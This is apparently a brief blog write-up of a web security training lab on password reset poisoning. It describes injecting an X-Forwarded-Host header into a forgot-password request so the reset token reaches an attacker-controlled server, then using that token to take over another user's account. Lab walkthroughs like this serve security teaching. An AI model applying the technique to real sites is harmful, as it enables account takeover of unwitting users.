Lan link.
The lab description says it is vulnerable to a password reset poisoning vulnerability. At first, we reset the password of the wiener user to understand the system structure.
Specifying username in the POST /forgot-password request is enough to request a password, if we can manipulate this request with X-Forwarded-Host, the email for username will go to our exploit server
If we look at the access log, we see that we get the value “temp-forgot-password-token=” and if we put this value in the token value in the URL, we reset the password of the user carlos.
Hello, I am Aleyna Doğan. I work as a Sr. Cyber Threat Intelligence Analyst. In my blog, we write blog posts that my friends and I want to share. Have a good read.